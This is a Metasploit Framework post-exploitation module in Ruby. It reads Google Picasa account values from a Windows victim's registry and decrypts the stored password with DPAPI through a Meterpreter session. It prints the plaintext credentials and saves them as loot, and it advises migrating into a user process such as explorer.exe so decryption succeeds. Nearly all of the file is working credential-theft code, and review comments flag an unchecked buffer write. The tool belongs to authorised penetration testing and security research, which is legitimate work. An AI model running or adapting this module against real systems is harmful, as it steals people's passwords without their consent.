GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/enum_picasa_pwds.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
  # Post-exploitation module that reads the Picasa 2 / early Picasa 3
  # 'GaiaEmail' and 'GaiaPass' values from HKCU and decrypts the password
  # blob by calling CryptUnprotectData (DPAPI) through railgun. The call is
  # made from the module's own process, so it only succeeds when that
  # process runs as the user who owns the profile (see #run).
  include Msf::Post::Windows::Registry
  include Msf::Post::Windows::Priv
  include Msf::Auxiliary::Report

  # Module metadata. The 'Compat' block lists the Meterpreter commands this
  # module relies on: railgun, getuid, and the process/memory primitives
  # used by #decrypt_password.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Google Picasa Password Extractor',
        'Description' => %q{
          This module extracts and decrypts the login passwords
          stored by Google Picasa.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Unknown', # SecurityXploded Team, www.SecurityXploded.com
          'Sil3ntDre4m <sil3ntdre4m[at]gmail.com>',
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        },
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_railgun_api
              stdapi_sys_config_getuid
              stdapi_sys_process_attach
              stdapi_sys_process_get_processes
              stdapi_sys_process_getpid
              stdapi_sys_process_memory_allocate
              stdapi_sys_process_memory_read
              stdapi_sys_process_memory_write
            ]
          }
        }
      )
    )
  end

  # Registers crypt32 with railgun if it is not already loaded, so that
  # CryptUnprotectData is callable from #decrypt_password.
  def prepare_railgun
    if !session.railgun.get_dll('crypt32')
      session.railgun.add_dll('crypt32')
    end
  end

  # Decrypts a DPAPI blob in the context of the current process.
  #
  # @param data [String] raw (already hex-decoded) encrypted blob
  # @return [String] plaintext bytes read back from process memory, or ''
  #   when CryptUnprotectData reported an output length of zero
  def decrypt_password(data)
    # Open the module's own process: the blob is copied into its address
    # space so a DATA_BLOB pointing at it can be passed to the API, and the
    # output is read back from the same address space afterwards.
    pid = client.sys.process.getpid
    process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)

    # NOTE(review): fixed 512-byte buffer, but the write is not bounded by
    # that size -- nothing here checks data.length before writing.
    mem = process.memory.allocate(512)
    process.memory.write(mem, data)

    # DATA_BLOB is { cbData; pbData }. The length and pointer are packed at
    # native width ('V' = 32-bit, 'Q' = 64-bit); packing cbData at 64 bits
    # presumably covers the struct padding on x64 -- confirm against the
    # railgun DATA_BLOB layout. The last argument is the size of the
    # pDataOut struct the API fills in (8 or 16 bytes).
    if session.sys.process.each_process.find { |i| i['pid'] == pid }['arch'] == 'x86'
      addr = [mem].pack('V')
      len = [data.length].pack('V')
      ret = session.railgun.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
      len, addr = ret['pDataOut'].unpack('V2')
    else
      addr = [mem].pack('Q')
      len = [data.length].pack('Q')
      ret = session.railgun.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16)
      len, addr = ret['pDataOut'].unpack('Q2')
    end

    # A zero output length is treated as "nothing decrypted"; the API's
    # success flag is not inspected here.
    return '' if len == 0

    # Read the plaintext from the buffer pDataOut points at.
    # NOTE(review): neither that buffer, the 512-byte allocation, nor the
    # process handle is released on any path through this method.
    decrypted_pw = process.memory.read(addr, len)
    return decrypted_pw
  end

  # Reads the Picasa 2 and Picasa 3 'GaiaEmail'/'GaiaPass' values from HKCU,
  # decrypts each password, prints the result and stores it as CSV loot.
  # A method-level rescue catches any StandardError raised along the way,
  # prints it, and returns nil instead of propagating.
  def get_registry
    print_status('Looking in registry for stored login passwords by Picasa ...')

    # Missing values are normalised to '' so the .empty? checks below work.
    username = registry_getvaldata('HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\', 'GaiaEmail') || ''
    password = registry_getvaldata('HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\', 'GaiaPass') || ''

    credentials = Rex::Text::Table.new(
      'Header' => 'Picasa Credentials',
      'Indent' => 1,
      'Columns' =>
      [
        'User',
        'Password'
      ]
    )

    # Flag (0/1) recording whether at least one credential was recovered;
    # decides between store_loot and the "not found" message at the end.
    foundcreds = 0
    if !username.empty? && !password.empty?
      # GaiaPass is stored as a hex string; decode to the raw DPAPI blob.
      passbin = [password].pack('H*')
      pass = decrypt_password(passbin)

      if pass && !pass.empty?
        print_status('Found Picasa 2 credentials.')
        # The plaintext is echoed to the console as well as written to loot.
        print_good("Username: #{username}\t Password: #{pass}")

        foundcreds = 1
        credentials << [username, pass]
      end
    end

    # For early versions of Picasa3
    # Same value names under the Picasa3 key; same decode/decrypt flow.
    username = registry_getvaldata('HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\', 'GaiaEmail') || ''
    password = registry_getvaldata('HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\', 'GaiaPass') || ''

    if !username.empty? && !password.empty?
      passbin = [password].pack('H*')
      pass = decrypt_password(passbin)

      if pass && !pass.empty?
        print_status('Found Picasa 3 credentials.')
        print_good("Username: #{username}\t Password: #{pass}")

        foundcreds = 1
        credentials << [username, pass]
      end
    end

    if foundcreds == 1
      # Persist the table as CSV loot attached to this session.
      path = store_loot(
        'picasa.creds',
        'text/csv',
        session,
        credentials.to_csv,
        'decrypted_picasa_data.csv',
        'Decrypted Picasa Passwords'
      )

      print_status("Decrypted passwords saved in: #{path}")
    else
      print_status('No Picasa credentials found.')
    end
  rescue StandardError => e
    print_error("An error has occurred: #{e}")
  end

  # Entry point. Refuses to proceed when running as SYSTEM, since the DPAPI
  # blob can only be unprotected in the owning user's security context;
  # otherwise loads crypt32 and runs the registry/decryption pass.
  def run
    uid = session.sys.config.getuid # Decryption only works in context of user's account.

    if is_system?
      print_error("This module is running under #{uid}.")
      print_error('Automatic decryption will not be possible.')
      print_error('Migrate to a user process to achieve successful decryption (e.g. explorer.exe).')
    else
      prepare_railgun
      get_registry
    end

    print_status('Done')
  end
end